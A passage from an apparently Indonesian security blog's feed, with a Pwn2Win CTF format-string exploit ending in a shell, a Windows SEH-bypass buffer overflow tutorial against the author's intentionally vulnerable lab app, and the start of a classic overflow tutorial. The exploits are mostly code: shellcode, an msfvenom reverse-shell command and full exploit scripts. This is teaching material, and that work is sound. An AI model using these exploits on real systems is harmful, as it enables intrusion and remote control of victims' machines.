class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">loc</span><span class="p">:</span> <span class="n">sc_loc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">sc_start</span><span class="o">+</span><span class="p">(</span><span class="mi">8</span><span class="o">*</span><span class="n">i</span><span class="p">))</span> </code></pre></div></div> <h4 id="stage-3-overwriting-function-pointer-and-seed-value">Stage 3. Overwriting function pointer and seed value</h4> <p>Using format string vulnerability, overwrite seed’s value to 1 and function pointer to point to start of shellcode (secret no #7).</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">entry</span> <span class="o">=</span> <span class="n">sc_loc</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span> <span class="o">&amp;</span> <span class="mh">0xffff</span> <span class="n">seed_val</span> <span class="o">=</span> <span class="mi">1</span> <span class="n">z</span> <span class="o">=</span> <span class="s">"%{}c%29$n|%{}c|%30$hn"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">seed_val</span><span class="p">.</span><span class="n">__str__</span><span class="p">(),</span> <span class="p">(</span><span class="n">entry</span><span class="o">-</span><span class="n">seed_val</span><span class="o">-</span><span class="mi">2</span><span class="p">).</span><span class="n">__str__</span><span class="p">())</span> <span class="n">pload_z</span> <span class="o">=</span> <span class="n">z</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">40</span><span class="p">,</span> <span class="s">'A'</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rwx</span><span class="p">)</span> <span class="n">change_username</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">pload_z</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-4-calculating-secret-value-and-storing-secret">Stage 4. Calculating secret value and storing secret</h4> <p>We build the shellcode to read from stdin and make program run our previous input shellcode from stdin that will call execve(“/bin/sh”).</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">c</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="p">.</span><span class="n">linux</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'rax'</span><span class="p">,</span> <span class="s">'rdx'</span><span class="p">,</span> <span class="mh">0x5000</span><span class="p">))</span> <span class="s">''' disasm(c) 0: 48 89 c7 mov rdi,rax 3: 31 c0 xor eax,eax # ignored 5: 48 89 d6 mov rsi,rdx 8: 31 d2 xor edx,edx a: b6 50 mov dh,0x50 c: 0f 05 syscall '''</span> <span class="n">sc_7</span> <span class="o">=</span> <span class="n">c</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">3</span><span class="p">:]</span> <span class="o">+</span> <span class="s">"</span><span class="se">\xeb</span><span class="s">{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">sc_loc</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">-</span> <span class="n">sc_loc</span><span class="p">[</span><span class="mi">6</span><span class="p">]</span><span class="o">-</span> <span class="mi">5</span><span class="p">))</span> <span class="n">sc_7</span> <span class="o">=</span> <span class="n">sc_7</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">sc_5</span> <span class="o">=</span> <span class="n">c</span><span class="p">[</span><span class="mi">5</span><span class="p">:</span><span class="mi">10</span><span class="p">:]</span> <span class="o">+</span> <span class="s">"</span><span class="se">\xe9</span><span class="s">{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">sc_loc</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">-</span> <span class="n">sc_loc</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span><span class="o">-</span> <span class="mi">5</span> <span class="o">-</span> <span class="mi">5</span><span class="p">))</span> <span class="n">sc_5</span> <span class="o">=</span> <span class="n">sc_5</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">sc_1</span> <span class="o">=</span> <span class="n">c</span><span class="p">[</span><span class="mh">0xa</span><span class="p">:</span><span class="mh">0xe</span><span class="p">:]</span> <span class="o">+</span> <span class="s">"</span><span class="se">\xe9</span><span class="s">{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="n">sc_loc</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">-</span> <span class="n">sc_loc</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">-</span> <span class="mi">5</span> <span class="o">-</span> <span class="mi">5</span> <span class="o">-</span> <span class="mi">6</span><span class="p">))</span> <span class="n">sc_1</span> <span class="o">=</span> <span class="n">sc_1</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">secret</span> <span class="o">=</span> <span class="p">[</span><span class="nb">str</span><span class="p">(</span><span class="n">u64</span><span class="p">(</span><span class="n">sc_1</span><span class="p">)),</span> <span class="s">"0"</span><span class="p">,</span> <span class="s">"0"</span><span class="p">,</span> <span class="s">"0"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">u64</span><span class="p">(</span><span class="n">sc_5</span><span class="p">)),</span> <span class="s">"0"</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">u64</span><span class="p">(</span><span class="n">sc_7</span><span class="p">))]</span> <span class="n">store_secret</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">secret</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-5-sending-shellcode">Stage 5. Sending shellcode</h4> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">s</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="p">.</span><span class="n">linux</span><span class="p">.</span><span class="n">sh</span><span class="p">())</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"B"</span><span class="o">*</span><span class="mh">0xf1</span> <span class="o">+</span> <span class="n">s</span><span class="p">)</span> </code></pre></div></div> <h4 id="pwned">Pwned</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ python solve.py [+] Starting local process './random_vault': pid 15280 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Leaking RWX region <span class="gp">[+] &gt;</span><span class="w"> </span>RWX region address: 0x55d1740e6000, seed address: 0x55d1740e6008 <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Calculating address of secret <span class="gp">[*] Stage 3 &gt;</span><span class="w"> </span>Overwriting <span class="k">function </span>pointer and seed value <span class="gp">[*] Stage 4 &gt;</span><span class="w"> </span>Calculating secret value and storing secret <span class="gp">[*] Stage 5 &gt;</span><span class="w"> </span>Sending shellcode <span class="go">[+] Pwn! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">uname</span> <span class="nt">-a</span> <span class="gp">Linux fokt 5.0.0-31-generic #</span>33~18.04.1-Ubuntu SMP Tue Oct 1 10:20:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux </code></pre></div></div> Tue, 19 Nov 2019 00:00:00 +0000 https://fachrioktavian.github.io//blog/ctf/pwn2win19-random_vault/ https://fachrioktavian.github.io//blog/ctf/pwn2win19-random_vault/ ctf linux x64 format string binary exploitation ctf <p>Kali ini saya akan membahas tentang sebuah mekanisme proteksi yang dapat menghalangi attacker saat ingin mengontrol register EIP ketika sudah dapat meng-overflow buffer. Mekanisme tersebut adalah Structured Exception Handler (SEH).</p> <h3 id="seh">SEH</h3> <p>SEH atau Structured Exception Handler adalah sebuah mekanisme yang digunakan untuk menangkap dan meng-handle exception / error yang terjadi saat program berjalan. Jika Anda agak sedikit bingung dengan penjelasannya, ingat block code <code class="language-plaintext highlighter-rouge">__try {} __except() {}</code> pada C (<a href="https://msdn.microsoft.com/en-us/library/zazxh1a9.aspx">link</a>). Program akan menjalankan kode-kode yang ada di dalam blok __try dan ketika program menangkap sebuah error, maka kode di dalam blok __except yang akan dijalankan.</p> <h3 id="eh-untuk-proteksi-eip">EH untuk proteksi EIP</h3> <p>Ketika sedang melakukan overflow, kita pasti akan mencari kontrol terhadap register EIP. Compiler C pada windows, secara default akan membuat exception handler sendiri sehingga ketika EIP tertimpa, error akan ditangkap dan mengeluarkan info crash (pop up program crash di Windows). Dengan adanya mekanisme tersebut, maka untuk mengoverflow EIP akan lebih sulit karena alur program akan dialihkan ke kode-kode yang berada pada blok __except buatan compiler. Namun ada tehnik yang dapat digunakan untuk membypass mekanisme EH.</p> <h3 id="persiapan">Persiapan</h3> <p>Tools yang akan kita gunakan untuk keperluan tutorial ini sama seperti pada <a href="https:/blog.fachriokt.com/c/2018/08/01/win32-classic-buffer-overflow.html">artikel sebelumnya</a>. Hanya saja kita akan menggunakan compiler yang berbeda untuk target binarynya. Anda perlu menginstall <a href="https://blogs.msdn.microsoft.com/vcblog/2017/11/02/visual-studio-build-tools-now-include-the-vs2017-and-vs2015-msvc-toolsets/">Visual Studio Build Tools</a> untuk bahasa pemograman C/C++. Kemudian compile source code menggunakan program CL.exe. Instruksi compile nya dapat dilihat di repo <a href="https://github.com/fachrioktavian/DVCA/tree/master/SEHBufferOverflow">github</a> saya. Atau kalau Anda tidak ingin pusing dan ribet compile dll, tinggal execute saja file binary .exe yang saya berikan.</p> <h3 id="jalankan-program">Jalankan program</h3> <p>Buka tool immunity debugger dan jalankan program dvca_bof.exe</p> <p><img src="/blog/images/posts/2018/p2_1.png" alt="dvca_seh.exe" title="dvca_seh.exe dijalankan oleh immunity debugger" width="600" /></p> <h3 id="membuat-program-crash">Membuat program crash</h3> <p>Seperti pada artikel pertama, kita harus mencari letak vulnerability program dengan cara membuatnya crash. Buatlah script python sperti berikut</p> <p>First we create python script to trigger program’s vuln.</p> <pre><code class="language-Python">#!/usr/local/bin/python #dvca_sehexploit.py from pwn import * def terima(p): data = p.recv(1024) log.info("recv: " + data) def kirim(p, payload): p.sendline(payload) log.info("send: "+ payload) evil = "A"*3000 p = remote('192.168.56.103', 31332) terima(p) kirim(p, evil) </code></pre> <p>Jalankan script dan lihat pada debugger.</p> <p><img src="/blog/images/posts/2018/p2_2.png" alt="dvca_seh.exe crash" title="dvca_seh.exe crash" width="600" /></p> <p>Jika dilihat pada bagian register EIP tidak tertimpa oleh karater <code class="language-plaintext highlighter-rouge">AAAA</code> sama sekali, namun program crash. Hal tersebut dikarenakan Exception Handler. Pada akhir stack program, compiler meletakkan dua pointer yaitu <code class="language-plaintext highlighter-rouge">nSEH</code> dan <code class="language-plaintext highlighter-rouge">SEH</code>. Pointer SEH adalah pointer yang mengarah ke routines untuk menghandle ketika error exception terdeteksi oleh program (dalam kasus ini adalah error overflow), sedangkan nSEH adalah pointer yang mengarah ke <code class="language-plaintext highlighter-rouge">next SEH</code> atau Exception handler selanjutnya apabila routines pada pointer SEH tidak dapat meng-handle-nya. Jika Anda perhatikan nSEH dan SEH ini akan membentuk sebuah struktur linked-list yang dinamakan <code class="language-plaintext highlighter-rouge">SEH chain</code>, gambarannya adalah sebagai berikut:</p> <p><img src="/blog/images/posts/2018/p2_3.jpg" alt="SEH chain" title="SEH chain" width="300" /></p> <p>Pada immunity debugger, untuk melihat SEH chain dapat memilih menu <code class="language-plaintext highlighter-rouge">view -&gt; SEH chain</code>. Pada gambar tracing debugger di atas, terlihat SE Handler mengarah ke address <code class="language-plaintext highlighter-rouge">0x41414141</code> yang tidak terdapat pada region virtual address manapun pada memory yang artinya kita berhasil mengoverflow 4 bit address SEH. Sampai sini kita dapat mengambil simpulan bahwa yang dapat dikontrol bukanlah register EIP melainkan 4 bit nSEH dan 4 bit SEH. Jadi, bagaimana kita mengubah alur program dengan hanya dapat mengontrol 8 bit pointer tersebut?</p> <h3 id="bypass-seh">Bypass SEH</h3> <p>Kita dapat mem-bypass alur exception ini dengan cara meng-overwrite 4 bit nSEH dengan <code class="language-plaintext highlighter-rouge">operation code yang mengarahkan program ke shellcode</code> kemudian meng-overwrite 4 bit SEH dengan block code dimana terdapat perintah <code class="language-plaintext highlighter-rouge">POP; POP; RET (PPR)</code> di dalamnya. Penjelasannya adalah sebagai berikut:</p> <p><img src="/blog/images/posts/2018/p2_4.jpg" alt="SEH bypass" title="SEH bypass" width="450" /></p> <ol> <li> <p>Ketika overflow terjadi, error access violation akan muncul dan men-trigger exception handler, dengan begitu alur program akan mengarah ke address yang berada di SEH dalam case kali ini berisikan address dari block code PPR</p> </li> <li> <p>Perintah pop; pop; ret akan mengarahkan register EIP ke 4 bit nSEH. Dalam kasus ini 4 bit nSEH harus berisikan operation code, namun karena tidak ada shellcode yang hanya memiliki panjang 4 bit maka kita harus mencari cara lain agar alur program mencapai shellcode. Caranya yaitu dengan menggunakan opcode jmp &lt;address&gt;. &lt;address&gt; adalah alamat memori dari shellcode.</p> </li> </ol> <p>Mengapa kita tidak menggunakan <code class="language-plaintext highlighter-rouge">jmp esp</code> untuk mengganti PPR sehingga alur program akan langsung kembali ke stack dan mengeksekusi shellcode? Jawabannya adalah karena mulai dari Windows XP SP1 terdapat tambahan mekanisme pada proses SEH yaitu ketika exception terjadi, semua value yang ada di register akan di XOR dengan dirinya sendiri sehingga akan menjadi <code class="language-plaintext highlighter-rouge">0x00000000</code>. Jadi jika Anda menggunakan gadget <code class="language-plaintext highlighter-rouge">jmp esp</code> maka Anda akan diarahkan ke address <code class="language-plaintext highlighter-rouge">0x00000000</code>.</p> <h3 id="nseh-dan-seh-offset">nSEH dan SEH offset</h3> <p>Sebelum kita melakukan exploitasi SEH, kita harus menemukan offset yang tepat dari pointer nSEH dan SEH. Caranya masih sama seperti pada artikel pertama yaitu menggunakan msf pattern dan <code class="language-plaintext highlighter-rouge">!mona findmsp</code></p> <p><img src="/blog/images/posts/2018/p2_5.png" alt="!mona findmsp" title="!mona findmsp" width="600" /></p> <p>Terlihat SEH record yang dimulai dari nSEH terdapat pada offset 1104 dan pasti diikuti oleh SEH pada offset 1108.</p> <h3 id="mencari-ppr-dengan-mona">Mencari PPR dengan mona</h3> <p>Anda tidak perlu pusing mencari PPR, mona secara otomoatis akan mencari gadget PPR di dalam region memori binary maupun dll. cukup menggunakan peritah <code class="language-plaintext highlighter-rouge">!mona seh</code></p> <p><img src="/blog/images/posts/2018/p2_6.png" alt="!mona seh" title="!mona seh" width="600" /></p> <p>Banyak gadget PPR dari dvca_sehlib.dll menunjukkan bahwa address ini akan selalu sama ketika dijalankan di komputer lain, sehingga exploit kita menjadi portable. Pada case kali ini saya menggunakan PPR pada address <code class="language-plaintext highlighter-rouge">0x19196530</code></p> <h3 id="jmp-to-front">Jmp to front</h3> <p>Untuk mencari opcode dari <code class="language-plaintext highlighter-rouge">jmp &lt;address&gt;</code>, Anda dapat menggunakan debugger untuk live edit instruksi assembly ketika program berjalan. Pertama-tama buat script python seperti sebelumnya dengan mengubah value variabel evil menjadi <code class="language-plaintext highlighter-rouge">evil = "A"*1104 + "\xCC"*4 + p32(ppr)</code> dengan <code class="language-plaintext highlighter-rouge">ppr = 0x19196530</code> lalu jalankan script tersebut.</p> <p><img src="/blog/images/posts/2018/p2_7.png" alt="int3" title="int3" width="450" /></p> <p>Program akan berhenti pada instruksi <code class="language-plaintext highlighter-rouge">\xCC</code> atau program interrupt (int3), hal ini akan memudahkan kita untuk melakukan breakpoint. Selanjutnya edit opcode INT3 menjadi instruksi <code class="language-plaintext highlighter-rouge">jmp &lt;address&gt;</code> dengan &lt;address&gt; adalah alamat shellcode atau alamat setelah SEH dimana kita akan menempatkan shellcode disana. Pada case ini saya akan melakukan <code class="language-plaintext highlighter-rouge">jmp 0x0145FF1B</code></p> <p><img src="/blog/images/posts/2018/p2_8.png" alt="jmp short" title="jmp short" width="600" /></p> <p>Kita dapatkan opcode nya yaitu <code class="language-plaintext highlighter-rouge">EB 0D</code>. INT3 yang lain dapat diganti dengan NOP sehingga opcode 4 bit menjadi <code class="language-plaintext highlighter-rouge">jfront = 0x90900deb</code> dan kita perlu meletakkan setidaknya 6 bit NOP sebelum shellcode agar shellcode tereksekusi sempurna.</p> <h3 id="shellcode--pwn">Shellcode + Pwn</h3> <p>Generate shellcode menggunakan msfvenom <code class="language-plaintext highlighter-rouge">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=9876 -b '\x00' -e x86/shikata_ga_nai -f python</code> lalu buat script exploit final.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/local/bin/python #dvca_sehexploit.py </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">terima</span><span class="p">(</span><span class="n">p</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"recv: "</span> <span class="o">+</span> <span class="n">data</span><span class="p">)</span> <span class="k">def</span> <span class="nf">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"send: "</span><span class="o">+</span> <span class="n">payload</span><span class="p">)</span> <span class="n">buf</span> <span class="o">=</span> <span class="s">""</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xb8\x46\x74\x2a\x7f\xd9\xd0\xd9\x74\x24\xf4\x5e\x33</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x80\x70\xc8</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x8a\xf0\x91\x8e\x75\x08\x62\xef\xfc\xed\x53\x2f\x9a</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x66\xc3\x9f\xe8\x2a\xe8\x54\xbc\xde\x7b\x18\x69\xd1</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xcc\x97\x4f\xdc\xcd\x84\xac\x7f\x4e\xd7\xe0\x5f\x6f</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x18\xf5\x9e\xa8\x45\xf4\xf2\x61\x01\xab\xe2\x06\x5f</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x70\x89\x55\x71\xf0\x6e\x2d\x70\xd1\x21\x25\x2b\xf1</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xc0\xea\x47\xb8\xda\xef\x62\x72\x51\xdb\x19\x85\xb3</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x15\xe1\x2a\xfa\x99\x10\x32\x3b\x1d\xcb\x41\x35\x5d</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x76\x52\x82\x1f\xac\xd7\x10\x87\x27\x4f\xfc\x39\xeb</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x16\x77\x35\x40\x5c\xdf\x5a\x57\xb1\x54\x66\xdc\x34</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xba\xee\xa6\x12\x1e\xaa\x7d\x3a\x07\x16\xd3\x43\x57</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xf9\x8c\xe1\x1c\x14\xd8\x9b\x7f\x71\x2d\x96\x7f\x81</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x39\xa1\x0c\xb3\xe6\x19\x9a\xff\x6f\x84\x5d\xff\x45</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x70\xf1\xfe\x65\x81\xd8\xc4\x32\xd1\x72\xec\x3a\xba</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x82\x11\xef\x6d\xd2\xbd\x40\xce\x82\x7d\x31\xa6\xc8</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x71\x6e\xd6\xf3\x5b\x07\x7d\x0e\x0c\xe8\x2a\x28\xcd</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x80\x28\x48\xeb\xc4\xa4\xae\x99\xf4\xe0\x79\x36\x6c</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xa9\xf1\xa7\x71\x67\x7c\xe7\xfa\x84\x81\xa6\x0a\xe0</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x91\x5f\xfb\xbf\xcb\xf6\x04\x6a\x63\x94\x97\xf1\x73</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xd3\x8b\xad\x24\xb4\x7a\xa4\xa0\x28\x24\x1e\xd6\xb0</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xb0\x59\x52\x6f\x01\x67\x5b\xe2\x3d\x43\x4b\x3a\xbd</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xcf\x3f\x92\xe8\x99\xe9\x54\x43\x68\x43\x0f\x38\x22</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x03\xd6\x72\xf5\x55\xd7\x5e\x83\xb9\x66\x37\xd2\xc6</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x47\xdf\xd2\xbf\xb5\x7f\x1c\x6a\x7e\x8f\x57\x36\xd7</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x18\x3e\xa3\x65\x45\xc1\x1e\xa9\x70\x42\xaa\x52\x87</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x5a\xdf\x57\xc3\xdc\x0c\x2a\x5c\x89\x32\x99\x5d\x98</span><span class="s">"</span> <span class="n">shellcode</span> <span class="o">=</span> <span class="n">buf</span> <span class="n">ppr</span> <span class="o">=</span> <span class="mh">0x19196530</span> <span class="n">jfront</span> <span class="o">=</span> <span class="mh">0x90900deb</span> <span class="n">nop</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">10</span> <span class="n">evil</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">1104</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">jfront</span><span class="p">)</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">ppr</span><span class="p">)</span> <span class="o">+</span> <span class="n">nop</span> <span class="o">+</span> <span class="n">shellcode</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'192.168.56.103'</span><span class="p">,</span> <span class="mi">31332</span><span class="p">)</span> <span class="n">terima</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="n">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">evil</span><span class="p">)</span> </code></pre></div></div> <p>Buka msfconsole lalu buat handler untuk menangkap reverse shell, jalankan script exploit final dan pwn!</p> <p><img src="/blog/images/posts/2018/p2_9.png" alt="pwn" title="pwn" width="600" /></p> <h3 id="metasploit-module">Metasploit module</h3> <p>Seperti pada artikel sebelumnya, exploit dalam bentuk script python dapat diubah menjadi module metasploit dalam bahasa ruby. Link modulenya sudah saya upload ke github. <a href="https://github.com/fachrioktavian/DVCA/blob/master/SEHBufferOverflow/sbof.rb">exploit/windows/DVCA/sbof.rb</a></p> <p>Setelah di-copy ke direktori module DVCA, maka Anda dapat menggunakannya di msfconsole</p> <p><img src="/blog/images/posts/2018/p2_10.png" alt="msfconsole" title="msfconsole exploit module" width="600" /></p> Fri, 31 Aug 2018 02:38:50 +0000 https://fachrioktavian.github.io//blog/research/win32-seh-bypass/ https://fachrioktavian.github.io//blog/research/win32-seh-bypass/ windows x86 stack buffer overflow research <p>Sebagai artikel pertama dari blog ini saya akan sedikit berbagi mengenai classic buffer overflow pada sistem Windows x86. Saya akan berasumsi kalau anda sudah lumayan mengerti mengenai <a href="http://www.cs.virginia.edu/~evans/cs216/guides/x86.html">Intel x86 Assembly Language</a> dan arsitektur program berformat <a href="https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format">PE</a>, format executable di dalam sistem Windows. Jika belum amka sebaiknya anda membaca terlebih dahulu. Tidak perlu jago, cukup memahami istilah dan sintax akan sangat membantu dalam mencerna isi dari artikel ini.</p> <h3 id="persiapan">Persiapan</h3> <p>Untuk membuat lab research, beberapa tool yang saya gunakan antara lain:</p> <ol> <li>Virtualization Software. <a href="https://www.virtualbox.org/">Virtualbox</a> atau <a href="https://www.vmware.com">VMWare</a>.</li> <li>Microsoft Windows 10 Pro 64 bit sebagai Guest OS. Saya memutuskan untuk menggunakan Windows 10 sebagai target machine karena saat ini OS tersebut yang banyak digunakan oleh banyak orang (khususnya Indonesia) ketimbang versi-versi sebelumnya (XP, 7, dll).</li> <li><a href="http://debugger.immunityinc.com/ID_register.py">Immunity Debugger</a>. Kita membutuhkan tool ini untuk melakukan debug (debugging) alur program. Install python 2.7 32 bit terlebih dahulu agar Immunity debugger dapat berfungsi dengan baik.</li> <li><a href="https://github.com/corelan/mona">Mona.py</a>. Mona sangat berguna dan membatu kita untuk mencari address tertentu ketika proses develop exploit. Letakkan mona.py pada direktori PyCommand di immunity debugger.</li> <li><a href="https://www.corelan.be/?dl_id=31">Pvefindaddr.py</a>. Sama seperti mona, pada beberapa kasus pvefindaddr.py akan sangat membantu.</li> <li><a href="https://github.com/ickerwx/pattern">Pattern.py</a>. script ini adalah script untuk men-generate offset sama seperti pada metasploit. Didevelop dalam bahasa pemograman python sehingga anda tidak perlu membuka metasploit.</li> <li><a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Framework</a>. Framework ini akan digunakan untuk proses develop exploit.</li> <li><a href="https://www.python.org/downloads/">Python</a> and <a href="https://github.com/Gallopsled/pwntools">Pwntools package</a>. Sebelum menulis module exploit dalama metasploit, kita dapat menggunakan python scripting untuk melakukan <code class="language-plaintext highlighter-rouge">try and error</code>.</li> <li>Sebagai OS host, anda dapat menggunakan OS apa saja. Yang terpenting adalah anda dapat menginstall metasploit dan pwntools.</li> <li><a href="https://github.com/fachrioktavian/DVCA">Damn Vulnerability CWin32 Apps - Classic Buffer Overflow</a>. Saya telah membuat repository berisikan program bercelah yang akan digunakan sebagai target dalam tutorial ini.</li> </ol> <h3 id="jalankan-program">Jalankan program</h3> <p>Buka tool immunity debugger dan jalankan program dvca_bof.exe</p> <p><img src="/blog/images/posts/2018/p1_1.png" alt="dvca_bof.exe" title="dvca_bof.exe dijalankan oleh immunity debugger" width="600" /></p> <h3 id="membuat-program-crash">Membuat program crash</h3> <p>Pertama kita buat script python untuk mentrigger celah program.</p> <pre><code class="language-Python">#dvca_bofexploit.py #!/usr/local/bin/python from pwn import * def terima(p): data = p.recv(1024) log.info("recv: " + data) def kirim(p, payload): p.sendline(payload) log.info("send: "+ payload) evil = "A"*2000 p = remote('192.168.56.103', 31331) terima(p) kirim(p, evil) </code></pre> <p>Jalankan script dan lihat pada debugger.</p> <p><img src="/blog/images/posts/2018/p1_2.png" alt="dvca_bof.exe crash" title="dvca_bof.exe crash" width="600" /></p> <p>Kita lihat register EIP berisikan data <code class="language-plaintext highlighter-rouge">0x41414141</code> yaitu representasi dari karakter <code class="language-plaintext highlighter-rouge">AAAA</code> di dalam memori. EIP adalah instruction pointer, sebuah register yang menyimpan alamat dari memori yang akan dieksekusi operation code-nya. Program crash karena pada memori tidak ditemukan alamat 0x41414141.</p> <h3 id="mengontrol-register-eip">Mengontrol register EIP</h3> <p>Sekarang kita akan mencari tahu offset dimana tepatnya karakter A kita menimpa isi data dari register EIP. kita dapat menggunakan pattern.py untuk men-generate metasploit pattern. <code class="language-plaintext highlighter-rouge">$ pattern.py create 2000</code> untuk membuat 2000 karakter metasploit.</p> <p>Kemudian script python menjadi:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#dvca_bofexploit.py #!/usr/local/bin/python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">terima</span><span class="p">(</span><span class="n">p</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span 